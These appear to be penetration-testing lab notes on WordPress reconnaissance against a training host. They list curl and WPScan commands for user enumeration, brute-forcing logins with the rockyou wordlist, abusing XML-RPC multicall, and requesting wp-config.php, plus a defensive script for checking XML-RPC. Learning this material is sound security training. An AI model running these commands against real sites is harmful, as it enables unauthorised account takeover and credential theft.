1. WordPress Discovery and Enumeration

1. Basic WordPress Identification

Perform initial checks to confirm if a website is running WordPress.

curl -s http://blog.inlanefreight.local/robots.txt  # Check for disallowed paths
curl -s http://blog.inlanefreight.local/wp-admin/  # Observe redirection behavior
curl -s http://blog.inlanefreight.local/wp-content/plugins/  # Check for plugin directory
curl -s http://blog.inlanefreight.local/wp-content/themes/  # Check for theme directory

2. WordPress Version and Theme Enumeration

Identify the WordPress version and active themes.

curl -s http://blog.inlanefreight.local | grep -i "WordPress"  # Check for version details
curl -s http://blog.inlanefreight.local/ | grep -i "themes"  # Identify themes
curl -s http://blog.inlanefreight.local/wp-content/themes/transport-gravity/style.css  # Check theme stylesheet
curl -s http://blog.inlanefreight.local/wp-content/themes/transport-gravity/readme.txt  # Check theme readme

3. Plugin Enumeration

Discover installed plugins which may have known vulnerabilities.

curl -s http://blog.inlanefreight.local/ | grep -i "plugins"
curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/readme.txt  # Check for version info
curl -s http://blog.inlanefreight.local/?p=1 | grep -i "plugins"  # Look for references in page content

4. User Enumeration (Manual)

Detect valid usernames using login response differences.

curl -s -i http://blog.inlanefreight.local/wp-login.php -d "log=admin&pwd=invalid"  # Valid user: error message says the password is wrong
curl -s -i http://blog.inlanefreight.local/wp-login.php -d "log=invalid&pwd=invalid"  # Invalid user: error message says the username is unknown (-i keeps the body; -I would send HEAD and drop it)

5. WPScan Enumeration

Use WPScan for automated WordPress enumeration.

sudo gem install wpscan
wpscan -h
sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token YOUR_API_TOKEN

WPScan Advanced Enumeration

sudo wpscan --url http://blog.inlanefreight.local --enumerate u,p,t  # Enumerate users, popular plugins and popular themes (ap/at for all, vp/vt for vulnerable only)

WPScan Brute-force Attack

sudo wpscan --url http://blog.inlanefreight.local --passwords /usr/share/wordlists/rockyou.txt --usernames admin,john

WPScan with Proxy

sudo wpscan --url http://blog.inlanefreight.local --proxy http://127.0.0.1:8080  # Route requests through an intercepting proxy (protocol://IP:port)

6. XML-RPC Checks

Check if XML-RPC is enabled, which can be exploited for brute-force attacks.

curl -i http://blog.inlanefreight.local/xmlrpc.php  # A 405 with "XML-RPC server accepts POST requests only." means the endpoint is enabled

XML-RPC Exploitation

List the methods the endpoint advertises and check whether system.multicall is among them, since it lets many login attempts be packed into a single request.

curl -X POST -d '<methodCall><methodName>system.listMethods</methodName></methodCall>' http://blog.inlanefreight.local/xmlrpc.php
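The listMethods reply is a plain XML-RPC array, so it can be checked offline once saved. The following is an added example and not part of the original notes: it parses a constructed sample reply (not a capture from the target) and reports which of the methods relevant to hardening are advertised; the function names are my own.

```shell
#!/bin/sh
# Constructed sample of a system.listMethods reply; a real WordPress reply lists
# many more methods, but the structure is the same.
SAMPLE_RESPONSE='<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><params><param><value><array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>wp.getUsersBlogs</string></value>
<value><string>pingback.ping</string></value>
</data></array></value></param></params></methodResponse>'

# Print one advertised method name per line from a listMethods reply on stdin.
list_methods() {
    grep -o '<string>[^<]*</string>' | sed 's/<[^>]*>//g'
}

# Exit 0 when the named method is advertised in the reply on stdin, 1 otherwise.
has_method() {
    list_methods | grep -qx "$1"
}

# Summarise the methods that matter for hardening:
#   system.multicall  - packs many calls (e.g. login attempts) into one request
#   wp.getUsersBlogs  - validates credentials, the usual target of such guessing
#   pingback.ping     - can be abused to make the site issue outbound requests
# If these are enabled and not needed, disabling XML-RPC with the WordPress
# filter add_filter('xmlrpc_enabled', '__return_false') removes the exposure.
xmlrpc_summary() {
    for m in system.multicall wp.getUsersBlogs pingback.ping; do
        if printf '%s' "$1" | has_method "$m"; then
            echo "$m: enabled"
        else
            echo "$m: not advertised"
        fi
    done
}

# Run against the constructed sample; replace with the saved curl output in practice.
xmlrpc_summary "$SAMPLE_RESPONSE"
```

Save the real reply with `curl ... > listmethods.xml` and run `xmlrpc_summary "$(cat listmethods.xml)"` to check the live endpoint.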

7. Additional Security Checks

Robots.txt Insights

Identify restricted areas and test for misconfigurations.

curl -s http://blog.inlanefreight.local/robots.txt | grep "Disallow"

Test if restricted files are still accessible:

curl -s http://blog.inlanefreight.local/wp-config.php

Page Source Analysis

Extract useful information such as API keys and endpoints.

curl -s http://blog.inlanefreight.local | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*"

Detect Open Directory Listings

curl -s http://blog.inlanefreight.local/wp-content/uploads/
